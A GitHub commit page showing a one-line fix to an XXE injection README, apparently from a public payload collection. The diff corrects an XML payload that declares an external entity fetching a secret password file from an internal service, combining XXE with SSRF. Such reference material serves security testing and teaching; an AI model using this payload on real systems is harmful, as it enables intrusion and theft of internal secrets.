We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents 832b54f + aa85b80 commit 24527a5Copy full SHA for 24527a5
XXE Injection/README.md
@@ -155,7 +155,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
155
<?xml version="1.0" encoding="ISO-8859-1"?>
156
<!DOCTYPE foo [
157
<!ELEMENT foo ANY >
158
-<!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >
+<!ENTITY xxe SYSTEM "http://internal.service/secret_pass.txt" >
159
]>
160
<foo>&xxe;</foo>
161
```
0 commit comments